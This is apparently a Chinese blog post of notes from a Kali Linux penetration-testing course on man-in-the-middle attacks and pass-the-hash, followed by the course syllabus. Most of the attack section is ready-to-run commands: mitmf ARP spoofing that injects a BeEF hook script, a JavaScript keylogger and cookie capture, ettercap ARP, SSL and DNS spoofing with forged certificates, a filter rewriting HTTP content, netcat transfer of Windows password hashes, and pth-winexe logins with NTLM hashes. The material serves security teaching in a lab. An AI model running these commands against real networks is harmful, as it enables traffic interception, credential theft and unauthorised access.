Kali Linux渗透测试 108 中间人攻击

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 中间人攻击


1. mitmf

  1. 简介

    • 即使没有XSS漏洞,也可以凌空向每个HTTP请求中注入XSS攻击代码
    • 一旦得手,影响范围巨大
    • 如果中间人发生在运营商线路上,很难引起用户注意
  2. 曾经号称最好用的中间人攻击工具(kali 2.0后默认未安装)

    # 安装环境
    root@kali:~# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
    
    # 安装 mitmf
    root@kali:~# apt-get install mitmf
    root@kali:~# pip uninstall Twisted
    root@kali:~# wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2
    root@kali:~# pip install ./Twisted-15.5.0.tar.bz2 
    
  3. 启动beef

    • cd /usr/share/beef-xss/
    • ./beef
  4. mitmf 中间人注入xss脚本

    # 作为中间人连接网页并插入 js
    root@kali:~# mitmf --spoof --arp -i eth0 --gateway 10.10.10.2 --target 10.10.10.133 --inject --js-url http://10.10.10.131:3000/hook.js
    


  5. 键盘记录器

    # 键盘记录器 --jskeylogger
    root@kali:~# mitmf --spoof --arp -i eth0 --gateway 10.10.10.2 --target 10.10.10.133 --jskeylogger
    
  6. 其他模块

    # 图片:--upsidedownternet、--screen(/var/log/mitmf)
    root@kali:~# mitmf --spoof --arp -i eth0 --gateway 10.10.10.2 --target 10.10.10.133 --upsidedownterne
    # cookie:--ferretng(cookie)
    root@kali:~# mitmf --spoof --arp -i eth0 --gateway 10.10.10.2 --target 10.10.10.133 --ferretng
    # 浏览器及插件信息: --browserprofiler
    # smb:--smbtrap、--smbauth(不演示)
    
  7. 旁路 –hsts

    • HTTP Strict Transport Security
    • 防止协议降级、cookie窃取
    • 安全策略通过HTTP响应头 “Strict-Transport-Security“实施
    • 限制 user-agent、https 等
  8. 凌空插后门 –filepwn

    • 用户下载的可执行程序在经过代理的时候,会被插入后门

2. ettercap

  1. 简介

    • 统一的中间人攻击工具
    • 转发 MAC 与本机相同,但 IP 与本机不同的数据包
    • 支持 SSH1、SSL 中间人攻击
  2. 模块划分

    • Snifer
      • 负责数据包转发
      • Unified
        • 单网卡情况下独立完成三层包转发
        • 始终禁用内核 ip_forward 功能
      • Bridge
        • 双网卡情况下的一层 MITM 模式
        • 可作为 IPS 过滤数据包
        • 不可在网关上使用(透明网桥)
    • MITM

      • 把流量重定向到 ettercap 主机上
      • 可以使用其他工具实现 MITM,ettercap 只作嗅探和过滤使用
      • 实现MITM的方法
        • ARP
        • ICMP
          • ICMP路由重定向,半双工
        • DHCP
          • 修改网关地址,半双工
        • Switch Port Stealing
          • flood目标地址是本机,源地址是受害者的包
          • 适用于ARP静态绑定的环境
        • NDP
          • IPv6协议欺骗技术
    • Filter

    • Log
    • Plugin
  3. 特性

    • 2.4以上内核对ARP地址欺骗的约束
      • 收到非请求的 ARP 响应包,不更新本地 ARP 缓存
      • Ettercap 使用ARP request 包进行攻击
    • Solaris 不根据ARP包更新本地ARP缓存
      • Ettercap 使用先发 ICMP 包来更新 ARP 缓存
  4. 用户操作界面

    • -T 文本界面图形
    • -G 界面
    • -C 基于文本的图形界面
    • -D 后台模式
  5. 指定目标

    • IPv4:MAC/IPs/Ports
    • IPv6:MAC/IPs/IPv6/Ports
    • /10.0.0.1−5;10.0.1.33/20−25,80,110
  6. 权限

    • 需要root权限打开链路层Socket连接,然后使用nobody账号运行
    • 日志写入目录需要nobody有写入权
    • 修改etter.conf:EC_UID=65534
  7. 基于伪造证书的SSL MITIM

    • Bridge模式不支持SSL MITM
    • openssl genrsa −out etter.ssl.crt 1024
    • openssl req −new−keyetter.ssl.crt −out tmp.csr
    • openssl x509 −req −days 1825 −in tmp.csr −signkey etter.ssl.crt−out tmp.new
    • cat tmp.new>>etter.ssl.crt
    • rm −f tmp.newtmp.csr
  8. ARP 中间人攻击

    • 字符模式(arp 欺骗)
      • ettercap -i eth0 -T -M arp -q /10.10.10.2// /10.10.10.133// -F 1.ef -P autoadd -w a.cap -l loginfo -L logall -m message
    • 图形界面
    • SSL MITM
      # 启用基于 SSL 的中间人攻击
      vim /etc/ettercap/etter.conf

    • DNS欺骗

      • dns_spoof插件配置文件
      • vi /etc/ettercap/etter.dns
  9. Ettercap 日志查看

    • etterlog -p log.eci
    • etterlog -c log.ecp
    • etterlog -c -f /1.1.1.1/ log.ecp
    • etterlog -B -n -s -F TCP:1.1.1.1:20:1.1.1.2:1234 log.ecp > aa 选择相应的连接并榨取文件
  10. Filter

    • /usr/share/ettercap/
    • /usr/share/ettercap/etter.filter.ssh
  11. SSH-2.xx / SSH-1.99 / SSH-1.51

    • SSH-1.99 代表兼容 ssh-2 和ssh1,可以使用 Filter 来只使用 ssh-1,利于监听
    • etterfilter etter.filter.ssh -o ssh.ef
  12. 替换HTTP内容

    if (ip.proto == TCP && tcp.src == 80)
    { msg(“data on TCP 80\n”);
    replace(“img src=”, “img src=\”http://1.1.1.1/1.gif\” “);
    replace(“IMG src=”, “img src=\”http://1.1.1.1/1.gif\” “);
    replace(“IMG SRC=”, “img src=\”http://1.1.1.1/1.gif\” “);
    }

  13. 其他欺骗

    • ICMP
      • -M icmp:00:11:22:33:44:55/10.0.0.1(真实网关的MAC/IP)
    • DHCP
      • −M dhcp:192.168.0.30,35,50−60/255.255.255.0/192.168.0.1(DNS)
    • Port
      • -M port /1.1.1.1/ /1.1.1.2/
    • Ndp
      • -M ndp //fe80::260d:afff:fe6e:f378/ //2001:db8::2:1/
      • -

2. Pass the Hash (PTH)

  1. 简介

    • 密码破解耗费时间资源巨大
    • 使用密文提交给服务器直接完成身份认证
    • NTLM/LM是没有加盐的静态HASH密文
    • 企业中使用ghost等工具克隆安装系统
    • pth-winexe -U w7%aad3b435b51404eeaad3b435b51404ee:ed1bfaeb3063 716ab7fe2a11faf126d8 //1.1.1.1 cmd
  2. 获取 win7 HASH 值

    • 使用 kali live iso 登录win7

    • nc 传输

      kali:nc -nvlp 333
      win7:nc 10.10.10.131 333
      结果:John:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
      
  3. kali 使用 密文直接登录

    root@kali:~# pth-winexe -U John%aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 //10.10.10.133 cmd
    
├─第1章 课程介绍 │ 任务001:Kali Linux渗透测试介绍.mp4 │ ├─第2章 Kali安装 │ 任务002:Kali Linux安装-硬盘安装、虚拟机安装.mp4 │ 任务003:Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令.mp4 │ 任务004:Kali Linux安装-熟悉环境.mp4 │ ├─第3章 工作环境优化 │ 任务005:网络配置、更新升级、安装软件包、浏览器插件.mp4 │ 任务006:安装Java、安装显卡驱动、安装网卡补丁、并发线程限制、电源优化.mp4 │ 任务007:.mp4 │ 任务008:.mp4 │ ├─第4章 实验环境 │ 任务009:实验环境.mp4 │ ├─章 基本工具 │ 任务010:基本工具-NETCAT(telnet-banner、传输文本信息).mp4 │ 任务011:基本工具-NETCAT(传输-目录、流媒体服务、端口扫描、远程克隆硬盘).mp4 │ 任务012:基本工具-远程控制、NCAT、WIRESHARK、WIRESHARK-筛选器、常见协议.mp4 │ 任务013:基本工具-常见协议包、WIRESHARK-TCP.mp4 │ 任务014:WIRESHARK-信息统计、实践.mp4 │ 任务015:TCPDUMP-抓包、筛选、高级筛选、过程文档记录.mp4 │ ├─章 信息收集 │ 任务016:被动信息收集:信息收集内容、信息用途、信息收集DNS、DNS信息收集-NSLOOKUP.mp4 │ 任务017:DNS信息收集-DIGmp4.mp4 │ 任务018:DNS区域传输、DNS字典爆破、DNS信息.mp4 │ 任务019:搜索引擎、SHODAN.mp4 │ 任务020:SHODAN.mp4 │ 任务021:google搜索:实例.mp4 │ 任务022:其他途径.mp4 │ 任务023:RECON-NG.mp4 │ ├─章 主动信息收集 │ 任务024:主动信息收集-发现.mp4 │ 任务025:主动信息收集-发现(二).mp4 │ 任务026:主动信息收集-发现(三).mp4 │ 任务027:主动信息收集-发现(四).mp4 │ 任务028:主动信息收集-发现(五).mp4 │ 任务029:端口扫描.mp4 │ 任务030:端口扫描(二).mp4 │ 任务031:服务扫描.mp4 │ 任务032:操作系统识别.mp4 │ 任务033:SMB扫描.mp4 │ 任务034:SMTP扫描.mp4 │ ├─章 弱点扫描 │ 任务035:弱点扫描.mp4 │ 任务036:NMAP.mp4 │ 任务037:NESSUS.mp4 │ 任务038:NEXPOSE.mp4 │ ├─章 缓冲区溢出 │ 任务039:缓冲区溢出.mp4 │ 任务040:POP3.mp4 │ 任务041:FUZZING.mp4 │ 任务042:Linux缓冲区溢出.mp4 │ 任务043:选择和修改EXP.mp4 | ├─章 提权 │ 任务45: 抓包嗅探.mp4 │ 任务46: WCE.mp4 │ 任务47: 利用漏洞提权.mp │ 任务48: 利用配置不当提权.mp4 │ 任务49: 收集敏感数据、隐藏痕迹.mp4 │ ├─章 无线 │ 任务050:无线渗透.mp4 │ 任务051:无线网运行模式和无线网硬件设备及基本概念.mp4 │ 任务052:无线技术概念.mp4 │ 任务053:Linux 无线协议栈及配置命令.mp4 │ 任务054:RADIOTAP头部.mp4 │ 任务055:CONTROL FRAME.mp4 │ 任务056:MANAGEMENT FRAME 管理帧.mp4 │ 任务057:REASSOCIATION REQUEST FRAME.mp4 │ 任务058:WEP加密、RC4算法.mp4 │ 任务059:WPA安全系统.mp4 │ 任务060:交换、无线渗透实操:AIRCRACK-NG基础、AIRODUMP-NG排错.mp4 │ 任务061:AIREPLAY-NG.mp4 │ 任务062:Mac地址绑定.mp4 │ 任务063:WPA.mp4 │ 任务064:COWPATTY 密码.mp4 │ 任务065:WPS.mp4 │ 任务066:WPS及其他工具.mp4 │ 任务067:EVIL TWIN AP、ROGUE AP.mp4 │ 任务068:AIRRACK-NG SUITE.mp4 │ 任务069:AIRRACK-NG(二).mp4 │ ├─章 补充 │ 任务070:协议分析.mp4 │ ├─第13章 Web渗透 │ 任务071:HTTP协议基础.mp4 │ 任务072:扫描工具-Nikto.mp4 │ 任务073:vega.mp4 │ 任务074:skipfish.mp4 │ 任务075:w3af.mp4 │ 任务076:w3af-身份认证.mp4 │ 任务077:w3af-截断.mp4 │ 任务078:Arachni.mp4 │ 任务079:OWASP_ZAP.mp4 │ 任务080:Burpsuite.mp4 │ 任务081:Burpsuite-intruder.mp4 │ 任务082:Burpsuite-repeater,Sequencer,编码,截断工具.mp4 │ 任务083:ACUNETIX WEB VULNERABILITY SCANNER.mp4 │ 任务084:APPSCAN.mp4 │ 任务085:答疑(Conky、、Linux4.4内核发布),手动漏洞挖掘.mp4 │ 任务086:手动漏洞挖掘(二).mp4 │ 任务087:手动漏洞挖掘(三).mp4 │ 任务088:手动漏洞挖掘(四).mp4 │ 任务089:KALI版本更新(第一个ROLLING RELEASE)和手动漏洞挖掘(SQL注入).mp4 │ 任务090:手动漏洞挖掘-SQL注入.mp4 │ 任务091:手动漏洞挖掘-SQL注入.mp4 │ 任务092:手动漏洞挖掘-SQL盲注.mp4 │ 任务093:SQLMAP- 自动注入.mp4 │ 任务094:SQLMAP自动注入-REQUEST.mp4 │ 任务095:SQLMAP自动注入(二)-REQUEST和SQLMAP自动注入(三)-OPTIMIZATION.mp4 │ 任务096:SQLMAP自动注入-INHECTION、DETECTION、TECHNIQUES、FINGERPRINT.mp4 │ 任务097:SQLMAP自动注入-ENUMERATION、BRUTE FORCE、UDF INJECTION、FILE SYSTEM、OS、WINDOWS REGISTORY、GENERAL、MISCELLANEOUS.mp4 │ 任务098:XSS-简介、跨站脚本检测和常见的利用手段.mp4 │ 任务099:XSS- 键盘记录器和反射型XSS.mp4 │ 任务100:存储型XSS和BEEF浏览器框架.mp4 │ 任务101:CSRF.mp4 │ 任务102:WEBSHELL.mp4 │ 任务103:HTTPS.mp4 │ 任务104:SSL、TLS中间人.mp4 │ 任务105:SSL、TLS拒绝服务和补充概念.mp4 │ ├─第14章 密码 │ 任务106:思路、身份认证方法、密码方法、字典.mp4 │ 任务107:字典、在线密码-hydra.mp4 │ 任务108:在线密码-hydra、在线密码-medusa、离线密码.mp4 │ 任务109:离线密码、离线密码-Hashcat.mp4 │ 任务110:离线密码.mp4 │ 任务111:密码嗅探(第四版剪辑版).mp4 │ 任务112:密码嗅探、中间人.mp4 │ 任务113:中间人、ARP MITM、中间人、Pass the Hash.mp4 │ ├─第15章 流量操控与隧道 │ 任务114:流量操控技术、重定向.mp4 │ 任务115:SSH隧道和SSH本地端口转发.mp4 │ 任务116:SSH远程端口转发和动态端口转发以及X协议转发.mp4 │ 任务117:DNS协议隧道、DNS协议隧道-dns2tcp.mp4 │ 任务118:DNS协议隧道-dns2tcp.mp4 │ 任务119:DNS协议隧道-iodine、NCAT.mp4 │ 任务120:SOCAT.mp4 │ 任务121:ptunnle.mp4 │ 任务122:proxytunnle.mp4 │ 任务123:sslh.mp4 │ 任务124:补充Proxytunnel、stunnel4.mp4 │ ├─第16章 拒绝服务 │ 任务125:拒绝服务介绍、DoS分类、个人DoS分类方法.mp4 │ 任务126:Syn-Flood、IP地址欺骗.mp4 │ 任务127:Smurf、Sockstress.mp4 │ 任务128:TearDrop.mp4 │ 任务129:DNS放大.mp4 │ 任务130:SNMP放大.mp4 │ 任务131:NTP放大.mp4 │ 任务132:应用层Dos.mp4 │ 任务133:拒绝服务工具-RUDY、Hping3、LAND、Siege.mp4 │ 任务134:拒绝服务工具-NMAP、匿名者拒绝服务工具包(匿名者发布的DoS工具)、其他拒绝服务工具-XOIC、HULK、DDOSIM、GoldenEye.mp4 │ ├─第17章 免杀 │ 任务135:恶意软件、防软件、免杀技术、当前现状.mp4 │ 任务136:当前现状、软件保护,自己编写后门.mp4 │ 任务137:Veil-evasion.mp4 │ 任务138:Veil-catapult.mp4 │ 任务139:Veil-catapult总结、另一种免杀思路、shellter.mp4 │ 任务140:Backdoor-f
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值